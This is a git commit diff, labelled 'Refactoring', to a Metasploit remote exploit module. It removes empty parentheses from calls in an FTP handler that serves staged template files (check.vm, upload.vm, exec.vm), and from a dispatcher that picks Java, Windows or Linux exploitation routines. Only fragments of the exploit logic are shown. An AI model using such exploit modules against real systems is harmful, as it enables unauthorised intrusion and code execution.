Refactoring
parent
8f3bb045b9
commit
2c3aec897f
|
@ -81,15 +81,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
|
||||
case arg
|
||||
when /check\.vm$/
|
||||
conn.put(wrap(get_check_vm()))
|
||||
conn.put(wrap(get_check_vm))
|
||||
when /javaprop\.vm$/
|
||||
conn.put(wrap(get_javaprop_vm()))
|
||||
conn.put(wrap(get_javaprop_vm))
|
||||
when /upload\.vm$/
|
||||
conn.put(wrap(get_upload_vm()))
|
||||
conn.put(wrap(get_upload_vm))
|
||||
when /exec\.vm$/
|
||||
conn.put(wrap(get_exec_vm()))
|
||||
conn.put(wrap(get_exec_vm))
|
||||
else
|
||||
conn.put(wrap(get_dummy_vm()))
|
||||
conn.put(wrap(get_dummy_vm))
|
||||
end
|
||||
c.put("226 Transfer complete.\r\n")
|
||||
conn.close
|
||||
|
@ -431,11 +431,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
case target.name.downcase
|
||||
when /java$/
|
||||
exploit_as_java()
|
||||
exploit_as_java
|
||||
when /windows$/
|
||||
exploit_as_windows()
|
||||
exploit_as_windows
|
||||
when /linux$/
|
||||
exploit_as_linux()
|
||||
exploit_as_linux
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue